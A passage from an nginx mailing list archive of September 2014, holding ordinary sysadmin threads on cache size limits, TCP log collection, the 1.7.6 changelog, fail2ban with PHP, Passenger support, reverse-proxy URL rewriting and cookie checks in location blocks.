16:05:24 +0400 Subject: Max File Size Allowed In Cache In-Reply-To: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> References: <02105dd93b8a02aa95e62e3ad9482055.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140930120524.GC69200@mdounin.ru> Hello! On Tue, Sep 30, 2014 at 01:35:30AM -0400, martinproinity wrote: > would be interesting to know the answer to this questions as I was wondering > as well if that is possible. As of now there is no easy way to limit caching based on a response size. In simple cases, when the Content-Length header is present in a response, the proxy_no_cache combined with a map (or embedded perl, or whatever) can be used to disable caching based on the Content-Length header returned. See here for documentation: http://nginx.org/r/proxy_no_cache http://nginx.org/r/map -- Maxim Dounin http://nginx.org/ From ron.van.der.vegt at openindex.io Tue Sep 30 13:54:22 2014 From: ron.van.der.vegt at openindex.io (Ron van der Vegt) Date: Tue, 30 Sep 2014 13:56:22 +0002 Subject: Trying to assemble logs through tcp, problems with multiple worker_processes Message-ID: <1412085262.3688.0@mail.openindex.io> Hi, Im trying to collect access log by passing them with tcp to flume. But the two tools below I tried both give me the same sintums, that it seems there is a race condition, when running nginx with multiple worker_processes: http://www.binpress.com/issue/possible-race-condition-while-nginx-is-running-on-more-workerprocesses/6955 https://github.com/cloudflare/lua-resty-logger-socket/issues/13 Anyone else have seen this problem, or maybe knows what is causing it? Thanks in advice, Ron From mdounin at mdounin.ru Tue Sep 30 14:01:12 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 30 Sep 2014 18:01:12 +0400 Subject: nginx-1.7.6 Message-ID: <20140930140111.GG69200@mdounin.ru> Changes with nginx 1.7.6 30 Sep 2014 *) Change: the deprecated "limit_zone" directive is not supported anymore. *) Feature: the "limit_conn_zone" and "limit_req_zone" directives now can be used with combinations of multiple variables. *) Bugfix: request body might be transmitted incorrectly when retrying a FastCGI request to the next upstream server. *) Bugfix: in logging to syslog. -- Maxim Dounin http://nginx.org/en/donation.html From nginx-forum at nginx.us Tue Sep 30 16:41:38 2014 From: nginx-forum at nginx.us (drfence) Date: Tue, 30 Sep 2014 12:41:38 -0400 Subject: Support team says Nginx + Passenger harder to support than Apache Message-ID: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> I work for a big news organization in the South East.. The support team is arguing that it's more difficult to support Nginx + Passenger because any patches, etc are made by updating source ( compiling modules statically ) and re-installing. This is as opposed to Apache that can be updated using yum with pre-built binaries. Curious what people on this mailing list say about the support team argument. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253635,253635#msg-253635 From viktor at szepe.net Tue Sep 30 16:49:26 2014 From: viktor at szepe.net (=?utf-8?b?U3rDqXBl?= Viktor) Date: Tue, 30 Sep 2014 18:49:26 +0200 Subject: fail2ban + nginx+PHP Message-ID: <20140930184926.Horde.Tv7DxgegXL671rD3KLwKTQ9@szepe.net> Good morning! 1 Is it possible to have nginx create another log entry on new lines/several error_log() PHP function? Now mmultiple error_log()-s are logged as one nginx error.log line. Apache logs them separatly even in FastCGI mode. 2 Does any of you use fail2ban with nginx+PHP? I mean triggering on PHP error_log() messages, not on HTTP/auth, non-existent script files etc. 3 When setting PHP error_log directive there is NO IP address prepended in the log line. Thank you! Sz?pe Viktor -- +36-20-4242498 sms at szepe.net skype: szepe.viktor Budapest, XX. ker?let From dewanggaba at xtremenitro.org Tue Sep 30 16:50:53 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Tue, 30 Sep 2014 23:50:53 +0700 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> References: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> Message-ID: <542ADF6D.90406@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Are you using system and/or config management to manage your third party software? IMHO, nginx and apache is same, the different is only on configuration and performance. Pkgs, pacthes, updates, etc depend on each linux distribution. IMHO. On 9/30/2014 23:41, drfence wrote: > I work for a big news organization in the South East.. The support > team is arguing that it's more difficult to support Nginx + > Passenger because any patches, etc are made by updating source ( > compiling modules statically ) and re-installing. This is as > opposed to Apache that can be updated using yum with pre-built > binaries. > > Curious what people on this mailing list say about the support > team argument. > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253635,253635#msg-253635 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJUKt9tAAoJEF1+odKB6YIxXmcH/R2XEajEDZ/ugiVEt0r56d44 EoGN+xtno1a1M3/5VuhpFBdK2D/MXxus7RxuS9HhNAovNMTWgjmee5pulhyeYyOW uX9B5zdXtXRl9eTaGU+646d1lAEYv1HXpHuRxX8rUVFXF2ZFj4rLqEttk8+zj/5s 0vsT/p9CCQDgpugyUdWClkXsadMGUVOat6huVg5Wbo06dGuqu7IxbZpSGMA/7HG1 IGLLFbgH4+botm7knQCr1UwooQC6OI7N8vF8aV0f7LYwmZ/ZBkAOLwW0TQbFPld9 ap993bpRJ6EAlVZqTgwSzxRjzxPZKYB/6JtDXM2hO1SNGMvOe8N3MyKmqr/pK4E= =Piv4 -----END PGP SIGNATURE----- From stl at wiredrive.com Tue Sep 30 17:15:48 2014 From: stl at wiredrive.com (Scott Larson) Date: Tue, 30 Sep 2014 10:15:48 -0700 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <542ADF6D.90406@xtremenitro.org> References: <717875f87927666288d648737634dde0.NginxMailingListEnglish@forum.nginx.org> <542ADF6D.90406@xtremenitro.org> Message-ID: Frankly it sounds more like laziness or being averse to change. All I can relay is experience with our setup here which is purely FreeBSD with an internal Poudriere based package build server, and system/config management with Salt. Taken as a whole it's a painless and relatively trivial process to keep nginx+modules fully up to date and pushed to all the servers. In your case the key part is the management layer. Salt, Ansible, Chef, Puppet, whatever, those things do the true heavy lifting once your server count rises to greater than two and completely levels the field for ease of updates between nginx and Apache. I will say the Passenger module seems to be one of those which goes through fits of updates which if I had to use it would be mildly irksome for non-technical reasons. But with a proper method of package deployment it remains an easy job. Even if nginx were slightly harder to keep updated, which again it's not, I'd still go through the trouble simply for the performance circles it runs around Apache. *__________________Scott LarsonSystems AdministratorWiredrive/LA310 823 8238 ext. 1106310 943 2078 faxwww.wiredrive.com www.twitter.com/wiredrive www.facebook.com/wiredrive * On Tue, Sep 30, 2014 at 9:50 AM, Dewangga wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Are you using system and/or config management to manage your third > party software? IMHO, nginx and apache is same, the different is only > on configuration and performance. > > Pkgs, pacthes, updates, etc depend on each linux distribution. IMHO. > > On 9/30/2014 23:41, drfence wrote: > > I work for a big news organization in the South East.. The support > > team is arguing that it's more difficult to support Nginx + > > Passenger because any patches, etc are made by updating source ( > > compiling modules statically ) and re-installing. This is as > > opposed to Apache that can be updated using yum with pre-built > > binaries. > > > > Curious what people on this mailing list say about the support > > team argument. > > > > Posted at Nginx Forum: > > http://forum.nginx.org/read.php?2,253635,253635#msg-253635 > > > > _______________________________________________ nginx mailing list > > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v2.0.17 (MingW32) > > iQEcBAEBAgAGBQJUKt9tAAoJEF1+odKB6YIxXmcH/R2XEajEDZ/ugiVEt0r56d44 > EoGN+xtno1a1M3/5VuhpFBdK2D/MXxus7RxuS9HhNAovNMTWgjmee5pulhyeYyOW > uX9B5zdXtXRl9eTaGU+646d1lAEYv1HXpHuRxX8rUVFXF2ZFj4rLqEttk8+zj/5s > 0vsT/p9CCQDgpugyUdWClkXsadMGUVOat6huVg5Wbo06dGuqu7IxbZpSGMA/7HG1 > IGLLFbgH4+botm7knQCr1UwooQC6OI7N8vF8aV0f7LYwmZ/ZBkAOLwW0TQbFPld9 > ap993bpRJ6EAlVZqTgwSzxRjzxPZKYB/6JtDXM2hO1SNGMvOe8N3MyKmqr/pK4E= > =Piv4 > -----END PGP SIGNATURE----- > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Sep 30 18:56:36 2014 From: francis at daoine.org (Francis Daly) Date: Tue, 30 Sep 2014 19:56:36 +0100 Subject: Rewriting location directive by upstream servers In-Reply-To: References: <20140925210552.GP3771@daoine.org> Message-ID: <20140930185636.GS3771@daoine.org> On Fri, Sep 26, 2014 at 10:12:47AM +0530, thunder hill wrote: > On Fri, Sep 26, 2014 at 2:35 AM, Francis Daly wrote: > > On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: Hi there, > > > When I access mysite.com/app1 the upstream server rewrites the url like > > > mysite.com/login instead of mysite.com/app1/login and the result is a > > > blank page. > > > > > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > > > cases app1 and app2 are getting rewritten with login or some other > > > extension. How to solve this issue.? > > > > I believe that the easiest way, if you want both to be available via > > the same hostname, is to install-or-configure app1 on backend1 to be > > available below the url /app1/, not below /. > Thats the easiest way. Unfortunately there is no control over backend > server(s). I believe the next easiest thing to do is to change the requirements, so that users access http://app1.mysite.com or http://app2.mysite.com instead of http://mysite.com/app1/ or http://mysite.com/app2/. You can allow initial access to http://mysite.com/app1/, and would issue a http redirect to http://app1.mysite.com, and have the server{} listening for that name proxy_pass to one backend. > Just a thought: > Is there a way to keep the url mysite.com/app1 and go on with > mysite.com/app1/login. That means backend server can only rewrite the > strings after mysite.com/app1 That depends (almost) entirely on the backend; but if you do not control it, I would be surprised if you can make it do this. (To my mind, if you don't control the backend, you don't reverse proxy to it. But that is probably not a universal opinion.) f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Tue Sep 30 19:29:14 2014 From: nginx-forum at nginx.us (drfence) Date: Tue, 30 Sep 2014 15:29:14 -0400 Subject: Support team says Nginx + Passenger harder to support than Apache In-Reply-To: <542ADF6D.90406@xtremenitro.org> References: <542ADF6D.90406@xtremenitro.org> Message-ID: We use chef. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253635,253642#msg-253642 From marcello.rocha at vagas.com.br Tue Sep 30 20:25:29 2014 From: marcello.rocha at vagas.com.br (Marcello Rocha) Date: Tue, 30 Sep 2014 17:25:29 -0300 Subject: Weird behavior when checking the existence of a cookie Message-ID: Hmmm... that's not really an option. The upstream does not know that it's under a subdir of the domain (and the devs insist that it shouldn't be coupled to that). Also, if the cookie detection lines are commented out, the proxy_pass (w/ the ending forward slash) works as expected. This specific behavior (cookie detection affecting proxy_pass) seems rather inconsistent. =/ Other than that the requirements are similar to the thread named "Rewriting location directive by upstream servers". Thanks :D *Marcello Rocha* Pesquisa & Desenvolvimento Date: Fri, 26 Sep 2014 14:11:57 -0300 > From: Wandenberg Peixoto > To: nginx at nginx.org > Subject: Re: Weird behavior when checking the existence of a cookie > Message-ID: > < > CAFXmt0Uvo1oQnFvvDBRHZNV8cG5+MqWDig3qBUAzFR+BkeNtYg at mail.gmail.com> > Content-Type: text/plain; charset="utf-8" > > By default the $uri is appended to the proxy_pass directive. > Since you defined as > proxy_pass http://upstream*/*; > and the $uri starts with a slash you will have a double slash. > > Try to set proxy_pass like > proxy_pass http://upstream; > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Sep 30 22:24:47 2014 From: francis at daoine.org (Francis Daly) Date: Tue, 30 Sep 2014 23:24:47 +0100 Subject: Weird behavior when checking the existence of a cookie In-Reply-To: References: Message-ID: <20140930222447.GT3771@daoine.org> On Fri, Sep 26, 2014 at 02:02:12PM -0300, Marcello Rocha wrote: Hi there, > I have this location block: > > location /some_path/ { > # this sets the mobile_rewrite variable based on a regex against > the user_agent > include /etc/nginx/mobile; > > # This is where the trouble lies. =/ > if ($cookie_mobileBypassDaily = yes_please) { > set $mobile_rewrite do_not_perform; > } This is an "if" inside a "location" which does something other than "return" or "rewrite...last". Generally, that's a thing to avoid. http://wiki.nginx.org/IfIsEvil Can you move those three lines outside of the "location" block? Actually: I suspect that the included file also does "if", so you may want to move that outside of the "location" block too. >From your description, they both do not depend on the particular request, so it may be ok to have them both at server{} level (and applying to all requests). f -- Francis Daly francis at daoine.org From kworthington at gmail.com Tue Sep 30 23:04:17 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 30 Sep 2014 19:04:17 -0400 Subject: [nginx-announce] nginx-1.7.6 In-Reply-To: <20140930140120.GH69200@mdounin.ru> References: <20140930140120.GH69200@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.7.6 for Windows http://goo.gl/WWIELz (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 30, 2014 at 10:01 AM, Maxim Dounin wrote: > Changes with nginx 1.7.6 30 Sep > 2014 > > *) Change: the deprecated "limit_zone" directive is not supported > anymore. > > *) Feature: the "limit_conn_zone" and "limit_req_zone" directives now > can be used with combinations of multiple variables. > > *) Bugfix: request body might be transmitted incorrectly when retrying > a > FastCGI request to the next upstream server. > > *) Bugfix: in logging to syslog. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: